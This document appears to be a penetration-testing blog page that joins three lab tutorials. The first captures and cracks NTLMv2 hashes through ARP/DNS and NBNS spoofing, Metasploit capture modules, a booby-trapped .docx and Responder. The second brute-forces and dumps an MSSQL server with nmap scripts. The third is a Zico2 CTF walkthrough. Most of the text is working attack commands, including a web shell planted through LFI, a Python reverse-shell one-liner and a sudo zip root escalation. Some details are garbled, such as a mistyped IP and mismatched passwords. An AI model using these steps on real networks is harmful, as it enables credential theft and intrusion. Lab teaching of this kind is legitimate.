4 ways to Capture NTLM Hashes in Network

Hello friends! Today we are describing how to capture NTLM Hash in a local network. In this article we had captured NTLM hash 4 times through various methods. Before we proceed towards attacking techniques, let’s read the brief introduction on NTLM Hash.

The acronym for word NTLM is made by combining following terms:

NT: New technologies (Windows)

LAN: Local area network

M: Manager

In a Windows network, NT LAN Manager (NTLM) is a suite of Microsoft security protocols. It was the default for network authentication in the Windows NT 4.0 operating system that provides authentication, integrity, and confidentiality to users. The NTLMv2 is the latest version and uses the NT MD4 based one way function. The hash lengths are 128 bits and work for local account and Domain account.

The NTLM protocol uses one or both of two hashed password values, both of which are also stored on the server (or domain controller), and which through a lack of salting are password equivalent, meaning that if you grab the hash value from the server, you can authenticate without knowing the actual password.

For more information visit Wikipedia.org

Let’s Begin!!

Requirement

Attacker: Kali Linux

Target: Windows 10

Capture NTLMv2 hash through Sniffing  

Being as attacker open etter.dns file from inside /etc/ettercap  in your Kali Linux system then replace whole text by editing given below line includes attacker’s IP and save the text document.

* A 192.168.1.103

Now follow the given bellow step to run ettercap to start sniffing.

·         Application > sniffing and spoofing > ettercap

·         Click on sniff and Select your network interface.

·         Scan for host to generate target list.

Select the host and add to target, from given image you read among 5 hosts I had chose 192.168.1.101 as target and add to target 1.

Click on MITM from menu bar to select ARP Poisoning, a dialog box will pop-up now enable “sniff remote connects” and click ok.

After then click on plugins option from menu bar and choose dns_spoof

By making use of dns_spoof attacker can redirect victim’s network traffic on his network IP, so that whatever victim will open on his web browser will get redirect on attacker’s IP.

Now load metasploit framework and execute following code to make use of http_ntlm module.

This module attempts to quietly catch NTLM/LM Challenge hashes.

use auxiliary/server/capture/http_ntlm

msf auxiliary(http_ntlm) > set srvhost 192.168.1.103

msf auxiliary(http_ntlm) > set SRVPORT 80

msf auxiliary(http_ntlm) > set URIPATH /

msf auxiliary(http_ntlm) > set JOHNPWFILE /root/Desktop/

msf auxiliary(http_ntlm) > exploit

Now according to above trap set for victim this module will capture NTLM password of victim’s system when he will open any http web site on his browser which will redirect that web site on attacker’s IP.

From given below image you can notice victim is trying to browse “hackingarticles.in” on his web browser but it requires authentication which is requesting for his username and password. Now if he try to open something else let says google.com there also it will ask username and password for authentication, until the victim will not submit his username and password he cannot browse anything on his web browser.

As the victim enter username and password, attacker at background will capture NTLM hash on his system.

Great!! The attacker had captured NTMLv2 hash, now let count detail apart from hash value that the attacker has captured.

From given image you can see that attacker has captured two things more:

Username: pentest

Machine name: Desktop-UKIQM20

Now use john the ripper to crack the ntlmv2 hash by executing given below command

john _netntlmv2

From given below image you can confirm we had successfully retrieved the password: 123 for user: pentest by cracking ntlmv2 hash.

Capture NTLMv2 hash through capture SMB & spoof NBNS

This module provides a SMB service that can be used to capture the challenge-response password hashes of SMB client systems. Responses sent by this service have by default the configurable challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel, L0phtcrack or John the ripper (with jumbo patch). To exploit this, the target system must try to authenticate to this module.

use auxiliary/server/capture/smb

msf auxiliary(smb) > set srvhost 192.168.1.103

msf auxiliary(smb) > set JOHNPWFILE /tmp/john_smb

msf auxiliary(smb) > exploit

Simultaneously run NBNS_response module under capture smb module.

This module forges NetBIOS Name Service (NBNS) responses. It will listen for NBNS requests sent to the local subnet's broadcast address and spoof a response, redirecting the querying machine to an IP of the attacker's choosing. Combined with auxiliary/server/capture/smb or auxiliary/server/capture/http_ntlm it is a highly effective means of collecting crackable hashes on common networks. This module must be run as root and will bind to udp/137 on all interfaces.

use auxiliary/spoof/nbns/nbns_response

msf auxiliary(nbns_response) > set SPOOFIP 1192.168.1.103

msf auxiliary(nbns_response) > set INTERFACE eth0

msf auxiliary(nbns_response) >exploit

As result this module will generate a fake window security prompt on victim’s system to establish connection with another system in order to access share folders of that system.

We had use nmap UDP and TCP port scanning command for identifying open ports and protocol and from given image you can port 137 is open for NetBIOS network service.

Now victim will try to access share folder therefore he will try of connect with him (attacker) through his network IP, given below image is a proof to demonstrate that victim is connecting attacker’s IP: 192.168.1.103.

When victim will try to access share folder, he will get trap into fake window security alert prompt, which will ask victims to enter his username and password for accessing share folders.

Awesome!! Once again the attacker had captured NTMLv2 hash, from given image you can see that here also the attacker has captured two things more:

Username: pentest

Machine name: Desktop-UKIQM20

Again use john the ripper to crack the ntlmv2 hash by executing given below command

john _netntlmv2

From given below image you can confirm we had successfully retrieved the password: 123 for user: pentest by cracking ntlmv2 hash.

Capture NTLMv2 hash through capture SMB & word UNC injector

This module modifies a .docx file that will, upon opening, submit stored netNTLM credentials to a remote host. It can also create an empty docx file. If emailed the receiver needs to put the document in editing mode before the remote server will be contacted. Preview and read-only mode do not work. Verified to work with Microsoft Word 2003, 2007, 2010, and 2013.

use auxiliary/docx/word_unc_injector

msf auxiliary(word_unc_injector) >set lhost 192.168.1.103

msf auxiliary(word_unc_injector) >exploit

It has created an empty docx file under given path /root/.msf4/local/

Now send this msf.docx file to victims and again run capture smb module in metasploit framework as done priviously.

From given below image you can observe that in order to get the hashes the auxiliary/server/capture/smb module has been used.

As the victim will open msf.docx file, again the attacker had captured NTMLv2 hash on his system. The only difference between above two attacks and in this attack is that here we had only captured NTLMv2 hash.

Again use john the ripper to crack the ntlmv2 hash by executing given below command

john _netntlmv2

From given below image you can confirm we had successfully retrieved the password: 123 for user: pentest by cracking ntlmv2 hash.

Responder

NBT-NS/LLMNR Responder Created by Laurent Gaffie which is an LLMNR, NBT-NS and MDNS poisoner with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server that can perform above all attacks. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix. By default, the tool will only answer to File Server Service request, which is for SMB.

This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587 and Multicast UDP 5553.

 Now open the new terminal and type following command to download it from github:

git clone https://github.com/SpiderLabs/Responder.git

cd Responder

Once it gets downloaded execute following command to run the python script.

python Responder.py –I 192.168.1.103 -I eth0

From specified image you can perceive that all poisoners and server services gets ON.

Now again victim will try to access share folder therefore he will try of connect with him (attacker) through his network IP, given below image is a proof to display that victim is connecting attacker’s IP: 192.168.1.103.

When victim will try to access share folder, he will get trap into fake network error alert prompt, as shown in given below image.

Once again the attacker had successfully captured NTMLv2 hash, from given image you can see that here also the attacker has captured two things more:

Username: pentest

Machine name: Desktop-UKIQM20

It will store captured NTLM hash in a text document under given /root/Desktop/Responder/logs.

Again use john the ripper to crack the ntlmv2 hash by executing given below command

john _netntlmv2

From given below image you can confirm we had successfully retrieved the password: 123 for user: pentest by cracking ntlmv2 hash.

 Wonderful! These were the four ways to trap the target user in order to capture NTLM hash.

MSSQL Peneration Testing using Nmap

Hello friends! Today we are going to perform Microsoft SQL penetration testing using NMAP scripts in order to retrieve basic information such as database name, usernames, tables name and etc from inside SQL server running on Windows operating system. In our previous article we had setup Microsoft SQL server in Windows 10.

Requirement

Attacker: kali Linux (NMAP)

Target: Windows 10 (MS SQL Server)

Lets start!!

Scan port 1433

Open the terminal in kali linux and scan target IP for port 1433 using nmap command.

nmap -p 1433 192.168.1.104

From given below image you can observe that port 1433 is open for MS-SQL service.

Enumerating version information

Given below command will attempt to determine configuration and version information for Microsoft SQL Server instances.

nmap -p 1433 --script ms-sql-info 192.168.1.104

In specified below image you can observe the install version and details of MS-SQL server.

Brute Force Attacker

Given below command will attempt to determine username and password through brute force attack against MS-SQL by means of username and password dictionary.

nmap -p 1433 --script ms-sql-brute --script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.104

In specfied image you can observe that we had successfully retrieve credential for two users:

·         Username: ignite and password:12345

·         Username: sa and password:123

Execute MS-SQL Query

Once you have retrieved the login credential use these credential in NMAP script to execute MS –SQL query. Given below will try to execute certain query “sp_database” against Microsoft SQL server.

Specified query “sp_databases” is part of record Stored Procedures and dump a list of database names from an instance of the SQL Server.

nmap -p 1433 --script ms-sql-query --script-args mssql.username=sa,mssql.password=admin123,ms-sql-query.query=“sp_databases” 192.168.1.104

Hence as result it has dumped two database names “ignite & master” whereas master is the default database name of MS_SQL server.

Check Microsoft SQL server configuration

Following command will attempt to describe Microsoft SQL server configuration setting by passing login credential as argument through nmap script.

nmap -p 1433 --script ms-sql-config --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

Hence you can check configuration setting from given below image.

Obtain list of tables

Following command will attempt to fetch list of tables from inside Microsoft SQL server by passing login credential as argument through nmap script.

nmap -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=admin123

192.168.1.104

Hence you can check list of tables from given below image.

Enumerate NetBIOS information

Given below NMAP script will enumerate information from remote Microsoft SQL services with NTLM authentication enabled.

Sending a MS-TDS NTLM authentication request with an invalid domain and null credentials will cause the remote service to respond with a NTLMSSP message disclosing information to include NetBIOS, DNS, and OS build version.

nmap -p 1433 --script ms-sql-ntlm-info 192.168.1.104

Hence from given below image you can read the NETBIOS information remote Microsoft SQL server.

Dump password hashes

Following command will dump the password hashes from an MS-SQL server in a format suitable for cracking by tools such as John-the-ripper. In order to do so the user needs to have the appropriate DB privileges.

nmap -p 1433 --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

From given image you can observe that it has dumped the hash value of passwords of user: sa which we have enumerated above.

Identify database owner

Following command will execute a query against Microsoft SQL Server instances for a list of databases a user has access to. In order to do so the user needs to have the appropriate DB privileges. Therefore we have passes username and password as argument through NMAP script.

nmap -p 1433 --script ms-sql-hashdbaccess --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

In specified image you can observe that it showing user sa is owner the database “ignite”.

Ms-SQL Allows XP_cmdshell option

The xp_cmdshell is a function of Microsoft SQL Server that allows system administrators to execute operating system command. By default, the xp_cmdshell option is disabled.

From given below image you can see we had enable the xp_cmdshell function by executing following statement inside master database.

EXEC sp_configure ‘xp_cmdshell’;

Now save above configuration setting through following statement:

 RECONFIGURE;

Exploit XP_cmdshell Function

Now following NMAP script will attempt to run a command using the command shell of Microsoft SQL Server if found xp_cmdshell is enabled in targeted server.

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

From given image you can confirm that we have executed OS command: net user as retrieve user account.

Blank password lead to unauthorized access

If the admin of Microsoft-SQL Server left the password Blank for login then attacker can director login into database server, from  given below image you can see we are exploring the property of a user’s account “sa”.

Here kept “blank space” as password for user “sa”. As we know by default sa is admin of MS-SQL server and now its password is blank space therefore chances of making unauthorized access into server by attacker will get increases.

Make unauthorized access into SQL server

Following  NMAP script will try to authenticate to Microsoft SQL Servers using an empty password for the sysadmin (sa) account.

nmap -p 1433 --script ms-sql-empty 192.168.1.104

From given below image you can perceive we had made successfully login with user: sa and empty password.

Hack the Zico2 VM (CTF challenge)

Today we are going to take another boot2root challenge known as Zico2 By “Rafael”, where we have to root the system to complete the challenge.

Download this VM here: https://download.vulnhub.com/zico/zico2.ova

Difficulty Level: Intermediate

Penetration Methodologies

Scanning

• Netdiscover
• Nmap

Enumeration

• HTTP surfing
• Directory enumeration

Exploiting

• LFI
• Obtaining reverse shell via netcat

Privilege Escalation

• Login through SSH
• Identify user’s credential
• Abusing SUID binarys

Capture the flag

Walkthrough

Scanning

Lets start off with finding IP using netdiscover and in this case our ip is 192.168.1.108.

netdiscover

Time to scan the Target’s IP with Nmap. The scan result shows port 22(ssh), port 111(rpcbind) and port  80 are open.

nmap -A 192.168.1.108

Enumeration

Since port 80 is running HTTP, so our obvious choice is to browse Target’s IP in the browser.

                                           

 We scroll through the page and click on “check them out” as can be seen in following screenshot.

 After clicking on previous page it takes us here and where we notice the URL which was looking for tools.html page and thus it could be vulnerable to LFI, let’s verfy it.

Here I tried to get LFI and succeeded with “/../../etc/passwd”. Now as we can read the content of passwd file we find a user ‘zico’ in there .Lets just save this info for now.

While enumerating directories through dirb, found an interesting directory “/dbadmin”.

dirb http://192.168.1.108/

 When we browse ‘/dbadmin’ directory, it displays a file named “test_db.php”.

Here, we can see a php database login page along with version name, so we can google things up or if we go by the name of “test_db” it hints at a default setup.

So tried ‘admin’ as password and it worked.

Next, we are using ‘Searchsploit’ and as the name indicates, it will search for all exploits and shellcodes for phpliteadmin(in this case) . In screenshot we can see that it is vulnerable to Remote php code execution and EDB-ID for the same is ‘24044’. Once we copy it to the current working directory (/root/24044.txt) and open it, we find guidelines to exploit the db .

searchsploit phpliteadmin

searchsploit -m 24044

cat 24044.txt

Here we have followed the guidelines :

Step1:Created a database and named it ‘shell.php’ (we had to add extension ‘.php’ with the database name)

          

Step 2: Created a table ‘shell’. Inside the table we created a column ‘field’, selected the type of the column to be an ‘Integer’ and set the default value to “ ?>”.

From the following screenshot it can be seen that our php code script has been saved in database.

Now we just have to run the file (the full path of the created php file is exposed)

So, to execute the file we can use the previously detected LFI vulnerability. And we have got lucky as we are inside ‘www-data’ .

http://192.168.1.108/view.php?page=../../usr/databases/shell.php&cmd=whoami

Time to set up netcat listener in our local machine and run the python code inside uploaded shell to get a reverse shell. (refer next screenshot for listener)

Python code reference: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

http://192.168.1.108/view.php?page=../../usr/databases/shell.php&cmd=  python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.108",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

To simulate a proper shell with TTY we use python one liner. Once at the shell, we find ‘wp-config.php’ file inside “/home/zico/wordpress”.

nc -lvp 1234

python -c 'import pty;pty.spawn("bin/bash")'

ls

cd /home

ls

cd zico

ls

cd wordpress

ls

Inside wp-config.php file we discover a database user zico and its password.  

cat wp-config.php

We use recently discovered credentials to login through ssh.

Then we use the sudo command to list all the commands the user can run with root privileges and we can see that the user can run both tar and zip commands as root without the need to enter any password.

So, now in the process of escalating the privileges from “zico” to “root”. At first, we create a file ‘raj’ than we perform three different tasks in a single line of code: first we zip the file ‘raj’ second move it to   /tmp/nisha.zip folder and lastly unzip it which will pop the root shell.

Finally, we get ‘flag.txt’ inside root directory. Hence, we accomplished the task.

ssh zico@192.168.1.108

sudo -l

touch raj

sudo zip /tmp/nisha.zip /home/zico/raj -T –unzip-command=”sh  -c /bin/bash”

cd /root

ls

cat flag.txt

Here is the complete reference to exploit sudo rights :https://www.hackingarticles.in/linux-privilege-escalation-using-exploiting-sudo-rights/